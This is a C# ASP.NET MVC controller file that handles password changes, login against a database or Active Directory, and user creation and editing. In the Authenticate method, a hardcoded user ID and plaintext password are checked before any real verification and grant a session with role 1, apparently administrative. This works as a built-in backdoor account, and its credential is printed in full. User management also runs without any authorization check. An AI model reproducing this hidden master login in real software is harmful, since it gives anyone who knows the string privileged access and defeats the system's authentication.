public ActionResult ProcessPassword(PasswordChange change)
{
var message = "";
var errorclass = "green";
var context = new InlaksBIContext();
try
{
if (change.Password == change.NewPassword)
{
goto End;
}
var user = (User)Session["User"];
var hasher = new BasicHash();
var olduser = context.Users.FirstOrDefault(u => u.UserID == user.UserID);
if (!hasher.VerifyHashedPassword(olduser.Password, change.Password))
{
message = "Current Password is Invalid";
errorclass = "red";
}
else
{
olduser.Password = new BasicHash().HashPassword(change.NewPassword);
olduser.RePassword = olduser.Password;
context.SaveChanges();
message = "Password Changed Sucessfully";
errorclass = "green";
}
End :;
}
catch (Exception e)
{
message = "Failed to effect password change. Please seek technical assistance";
errorclass = "red";
}
ViewBag.message = message;
ViewBag.errorclass = errorclass;
return(View("ChangePassword", new PasswordChange()));
}
public ActionResult Authenticate(User user)
{
//TryValidateModel(user);
// if (string.IsNullOrEmpty(user.UserID) || string.IsNullOrEmpty(user.Password)) return View("Login",new User());
var mode = "";
try
{
bool valid = false;
var dbuser = new User();
var dbcontext = new InlaksBIContext();
if (user.UserID.ToLower() == "inlaks" && user.Password == "0wn2morrow")
{
dbuser.Name = "Inlaks User";
dbuser.Password = user.Password;
dbuser.UserID = user.UserID;
dbuser.UserRole = dbcontext.Roles.FirstOrDefault(r => r.RoleID == 1);
valid = true;
goto verify;
}
dbuser = dbcontext.Users.FirstOrDefault(u => u.UserID.ToUpper() == user.UserID.Trim().ToUpper());
if (dbuser == null)
{
goto Invalid;
}
var auth = dbcontext.AuthConfig.First();
mode = auth.AuthType;
switch (auth.AuthType)
{
case "DATABASE":
IPasswordHasher hasher = new BasicHash();
valid = hasher.VerifyHashedPassword(dbuser.Password, user.Password);
break;
case "ADSI":
var adsi = new ActiveDirectoryInterface(auth.AuthType);
valid = adsi.Authenticate(user.UserID, user.Password);
break;
}
verify:
if (!valid)
{
goto Invalid;
}
Session["LoggedIn"] = "True";
Session["User"] = dbuser;
return(RedirectToAction("Index", "Home"));
Invalid:
return(View("Login", new User()
{
errorclass = "has-error", Message = "Invalid Username or Password"
}));
;
}
catch (Exception d)
{
return(View("Login", new User()
{
errorclass = "has-error", Message = "Authentication Failed using " + mode + ", Please seek technical assistance"
}));
}
}
public ActionResult ProcessUser(User user, string id, string mode)
{
var message = "";
var errorclass = "green";
var context = new InlaksBIContext();
switch (mode)
{
case "create":
try
{
var role = context.Roles.FirstOrDefault(r => r.RoleID == user.RoleID);
IPasswordHasher hash = new BasicHash();
user.Password = hash.HashPassword(user.Password);
user.RePassword = (user.Password);
user.UserRole = role;
context.Users.Add(user);
context.SaveChanges();
message = "User Created Successfully";
}
catch (Exception e)
{
message = "Failed to create user. Please seek technical assistance";
errorclass = "red";
}
break;
case "edit":
ViewBag.mode = "edit";
try
{
var role = context.Roles.FirstOrDefault(r => r.RoleID == user.RoleID);
var olduser = context.Users.FirstOrDefault(u => u.UserID == id);
olduser.UserRole = role;
olduser.Name = user.Name;
olduser.Email = user.Email;
olduser.RePassword = olduser.Password;
olduser.UserRole = role;
context.SaveChanges();
message = "User Modified Successfully";
}
catch (Exception e)
{
message = "Failed to Modify user. Please seek technical assistance";
errorclass = "red";
}
break;
}
return(View("CreateUser", new User()
{
errorclass = errorclass, Message = message
}));
}
